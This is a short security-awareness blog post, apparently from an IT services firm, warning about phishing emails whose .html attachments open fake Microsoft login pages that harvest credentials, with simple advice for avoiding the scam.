Avoid this scam email

See here one of the latest scam emails we’ve seen quite a lot lately. It can come with a subject containing “Invoice” or “Voicemail” or other title that may seem benine or common to your usual email activity. One big giveaway is the attachment on this email ends with .html (highlighted). Also, it comes from another legitimate organisation’s domain (highlighted), which indicates their email server has been hacked and used to send this email to you and other target organisations.

When you attempt to open the attachment you are taken to a login screen. This may look similar to a Microsoft Login page that we are used to however it’s not. This form sends your email address and password to the attacker.

This login form will send your email address and password to the attacker.

A couple of simple rules to follow can avoid this scam and others.

  • Never login to a form that is presented after clicking a link or attachment. If you are certain it’s legitimate, still login at office.com or the target service first, not via the link.

  • .html attachments will 99.99% of the time be a scam attachment. If unsure first contact the person who sent the link at their listed known phone number or email address, not from a phone number on the email or by replying to the email.

  • Turn on two factor authentication for you and all of your organisation email addresses. This will serve as your extra layer of defence if someone accidentally falls victim.

  • Discuss it with others! The best way to avoid these scams in your organisation is to make others aware.

  • Implement Secure Defaults for your Office 365, Google or other email and office collaboration systems. Follow best security practices for your organisation’s systems, we can help you more with this.

Next
Next

Cyber Security Controls - The Defensive Layers of a Secure Organisation